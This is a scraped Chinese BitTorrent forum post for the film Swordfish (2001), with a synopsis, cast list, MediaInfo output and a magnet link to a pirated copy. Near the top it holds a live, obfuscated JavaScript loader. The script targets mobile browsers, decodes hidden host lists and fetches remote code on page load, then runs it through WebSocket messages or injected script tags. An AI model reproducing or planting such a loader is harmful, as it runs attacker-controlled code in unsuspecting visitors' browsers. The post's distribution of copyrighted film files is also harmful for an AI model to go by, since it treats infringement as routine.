剑鱼行动[中文字幕].Swordfish.2001.1080p.BluRay.x265.10bit.AC3 7.10GB

版主小s 1月前 277

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 剑鱼行动 / 极速爆劫(港) / 剑鱼(台) / 旗鱼行动
◎片  名 Swordfish
◎年  代 2001
◎产  地 美国 / 澳大利亚
◎类  别 动作 / 惊悚 / 犯罪
◎语  言 英语 / 德语
◎上映日期 2001-06-08(美国)
◎IMDb链接 https://www.imdb.com/title/tt0244244/
◎豆瓣评分 7.5/10 (62581人评价)
◎豆瓣链接 https://movie.douban.com/subject/1304608/
◎片  长 99 分钟
◎导  演 多米尼克·塞纳 Dominic Sena (id:1045114)
◎编  剧 斯基普·伍兹 Skip Woods (id:1301255)
◎演  员 约翰·特拉沃尔塔 John Travolta (id:1054426)
       休·杰克曼 Hugh Jackman (id:1010508)
       哈莉·贝瑞 Halle Berry (id:1054415)
       唐·钱德尔 Don Cheadle (id:1053573)
       山姆·夏普德 Sam Shepard (id:1040574)
       维尼·琼斯 Vinnie Jones (id:1013804)
       德瑞·德·玛泰 Drea de Matteo (id:1012513)
       鲁道夫·马丁 Rudolf Martin (id:1123859)
       扎克·格雷尼尔 Zach Grenier (id:1099400)
       卡姆林·格里梅斯 Camryn Grimes (id:1098587)
       Angelo Pagan Angelo Pagan (id:1353766)
       克里克·B·R·沃勒尔 Kirk B.R. Woller (id:1163505)
       卡门·阿尔根齐亚诺 Carmen Argenziano (id:1057303)
       蒂姆·迪凯 Tim DeKay (id:1017978)
       Laura Lane Laura Lane (id:1165177)
       Craig Braun Craig Braun (id:1076752)
       威廉·麦鲍瑟 William Mapother (id:1000165)
       伊利亚·沃里克 Ilia Volok (id:1346238)
       乔纳森·弗垃泽 Jonathan Fraser (id:1084441)
       Shawn Woods Shawn Woods (id:1169163)
       达娜·喜 Dana Hee (id:1041461)
       丹尼·皮尔斯 Denney Pierce (id:1294516)
       Joey Box Joey Box (id:1077452)
       Debbie Evans Debbie Evans (id:1283343)
       Tim Storms Tim Storms (id:1298525)
       马克·索珀 Mark Soper (id:1149484)
       纳塔丽·索科洛娃 Natalia Sokolova (id:1028372)
       Anika Poitier Anika Poitier (id:1137237)
       尼克·罗兰 Nick Loren (id:1120203)
       蒂莫西·奥门德森 Timothy Omundson (id:1132960)
       Astrid Veillon Astrid Veillon (id:1152349)
       Dean Rader-Duval  Dean Rader-Duval (id:1335081)
       Shane Brock Shane Brock (id:1207931)
       Russ Cootey Russ Cootey (id:1192790)
       泰特·多诺万 Tate Donovan (id:1027848)
       塞拉·法伯 Sierra Farber (id:1182942)
       Mimi Fletcher Mimi Fletcher (id:1089446)
       Cory Parella Cory Parella (id:1176683)
       Gary Rodriguez Gary Rodriguez (id:1145032)
       Travis Rosario Travis Rosario (id:1186978)
       George Marshall Ruge George Marshall Ruge (id:1137556)
       唐·耶索 Don Yesso (id:1166593)
       沈晓谦 Xiaoqian Shen (id:1347970)
       童自荣 Zirong Tong (id:1318216)
       乔纳森·D.克兰 Jonathan D. Krane (id:1276659)
       斯基普·伍兹 Skip Woods (id:1301255)
       史蒂芬·E·里夫金 Stephen E. Rivkin (id:1295725)
       Lora Kennedy Lora Kennedy (id:1288398)
       杰·哈特 Jay Hart (id:1286155)
       Geoff Hubbard Geoff Hubbard (id:1287061)
       Ha Nguyen Ha Nguyen (id:1293123)
       米歇尔·布勒 Michelle Bühler (id:1279844)
       苏珊·V·卡利诺夫斯基 Susan V. Kalinowski (id:1288039)
       敏迪·霍尔 Mindy Hall (id:1285857)
       克里斯蒂安·汀斯利 Christien Tinsley (id:1299294)
       Lisa C. Satriano Lisa C. Satriano (id:1276451)
       丹·布莱德利 Dan Bradley (id:1279145)
       Katie Carroll Katie Carroll (id:1280171)
       Spencer Levy Spencer Levy (id:1303093)
       Rhonda C. Gunner Rhonda C. Gunner (id:1285640)
       Mark Intravartolo Mark Intravartolo (id:1287344)
       Marc Kolbe Marc Kolbe (id:1288837)
       Ken Lam Ken Lam (id:1289300)
       David Alexander David Alexander (id:1302497)
       Craig A. Mumma Craig A. Mumma (id:1292701)
       罗科·帕西尼诺 Rocco Passionino (id:1294053)
       博伊德·谢尔米斯 Boyd Shermis (id:1297440)
       Andrea D'Amico Andrea D'Amico (id:1281681)

◎标  签 犯罪 / 动作 / 美国 / JohnTravolta / 美国电影 / 剑鱼行动 / HughJackman / 剧情

◎简  介
  间谍加布利尔(约翰?特拉沃塔 John Travolta)在多年特工生涯中,获知政府多年非法收敛了一笔公款。而加布利尔若想实现自己心中的梦想,钱是最关键的因素。正因如此,机智狡猾的加布利尔决定向这笔赃款下手。                                    
                                要想计划能顺利进行,加布利尔需要一名顶尖的电脑黑客。斯坦利(休?杰克曼 Hugh Jackman)正是地球上最顶级的黑客之一,多年前他就把FBI引以为豪的安全系统搞得天翻地覆,亦因此的引来牢狱之灾,妻子带着女儿远走他乡。出狱后一直被禁止使用电脑和其他电子产品。                                    
                                加布利尔派他的女搭档金吉尔(哈莉?贝瑞 Halle Berry)游说斯坦利出山,承诺成功后帮斯坦利取回女儿的抚养权并安排其远走高飞享受新生活。经不住诱惑,斯坦利再度出山。然而,事情并没有像预想中顺利……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 157202727573942234798228656361555308147 (0x764424DFA294459E4CA5D64A941B2E73)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.10 GiB

  8. Duration                                 : 1 h 39 min

  9. Overall bit rate                         : 10.2 Mb/s

  10. Encoded date                             : UTC 2021-08-29 02:49:51

  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 39 min

  20. Bit rate                                 : 9 486 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 798 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.258

  30. Stream size                              : 6.58 GiB (93%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=14.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x798 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default                                  : Yes

  34. Forced                                   : No


  35. Audio

  36. ID                                       : 2

  37. ID in the original source medium         : 4352 (0x1100)

  38. Format                                   : AC-3

  39. Format/Info                              : Audio Coding 3

  40. Commercial name                          : Dolby Digital

  41. Codec ID                                 : A_AC3

  42. Duration                                 : 1 h 39 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 640 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : L R C LFE Ls Rs

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 31.250 FPS (1536 SPF)

  49. Compression mode                         : Lossy

  50. Stream size                              : 454 MiB (6%)

  51. Language                                 : English

  52. Service kind                             : Complete Main

  53. Default                                  : Yes

  54. Forced                                   : No

  55. Original source medium                   : Blu-ray


  56. Text #1

  57. ID                                       : 3

  58. ID in the original source medium         : 4613 (0x1205)

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 1 h 32 min

  64. Bit rate                                 : 58.9 kb/s

  65. Count of elements                        : 3996

  66. Stream size                              : 39.2 MiB (1%)

  67. Title                                    : chs&eng

  68. Language                                 : Chinese

  69. Default                                  : Yes

  70. Forced                                   : No

  71. Original source medium                   : Blu-ray


  72. Text #2

  73. ID                                       : 4

  74. ID in the original source medium         : 4614 (0x1206)

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 32 min

  80. Bit rate                                 : 59.2 kb/s

  81. Count of elements                        : 3996

  82. Stream size                              : 39.4 MiB (1%)

  83. Title                                    : cht&eng

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No

  87. Original source medium                   : Blu-ray


  88. Text #3

  89. ID                                       : 5

  90. ID in the original source medium         : 4615 (0x1207)

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 32 min

  96. Bit rate                                 : 39.2 kb/s

  97. Count of elements                        : 3996

  98. Stream size                              : 26.0 MiB (0%)

  99. Title                                    : chs

  100. Language                                 : Chinese

  101. Default                                  : No

  102. Forced                                   : No

  103. Original source medium                   : Blu-ray


  104. Text #4

  105. ID                                       : 6

  106. ID in the original source medium         : 4616 (0x1208)

  107. Format                                   : PGS

  108. Muxing mode                              : zlib

  109. Codec ID                                 : S_HDMV/PGS

  110. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration                                 : 1 h 32 min

  112. Bit rate                                 : 39.5 kb/s

  113. Count of elements                        : 3996

  114. Stream size                              : 26.2 MiB (0%)

  115. Title                                    : cht

  116. Language                                 : Chinese

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Text #5

  121. ID                                       : 7

  122. ID in the original source medium         : 4608 (0x1200)

  123. Format                                   : PGS

  124. Muxing mode                              : zlib

  125. Codec ID                                 : S_HDMV/PGS

  126. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration                                 : 1 h 38 min

  128. Bit rate                                 : 42.5 kb/s

  129. Count of elements                        : 1804

  130. Stream size                              : 30.0 MiB (0%)

  131. Title                                    : eng

  132. Language                                 : English

  133. Default                                  : No

  134. Forced                                   : No

  135. Original source medium                   : Blu-ray


  136. Menu

  137. 00:00:00.000                             : 第 01 章

  138. 00:04:03.701                             : 第 02 章

  139. 00:08:12.033                             : 第 03 章

  140. 00:11:47.456                             : 第 04 章

  141. 00:15:07.489                             : 第 05 章

  142. 00:18:47.042                             : 第 06 章

  143. 00:21:58.275                             : 第 07 章

  144. 00:24:14.786                             : 第 08 章

  145. 00:25:50.090                             : 第 09 章

  146. 00:30:36.000                             : 第 10 章

  147. 00:34:01.289                             : 第 11 章

  148. 00:37:44.262                             : 第 12 章

  149. 00:42:11.654                             : 第 13 章

  150. 00:46:48.305                             : 第 14 章

  151. 00:49:12.824                             : 第 15 章

  152. 00:51:52.275                             : 第 16 章

  153. 00:55:27.324                             : 第 17 章

  154. 00:58:32.509                             : 第 18 章

  155. 01:03:18.544                             : 第 19 章

  156. 01:05:53.616                             : 第 20 章

  157. 01:09:19.989                             : 第 21 章

  158. 01:11:11.433                             : 第 22 章

  159. 01:15:24.895                             : 第 23 章

  160. 01:20:09.095                             : 第 24 章

  161. 01:23:15.782                             : 第 25 章

  162. 01:26:55.960                             : 第 26 章

  163. 01:29:01.336                             : 第 27 章

  164. 01:30:59.454                             : 第 28 章

  165. 01:33:29.729                             : 第 29 章



TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:C60A147E77A25255B79AA38E3C60A5EE0D29AC2C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回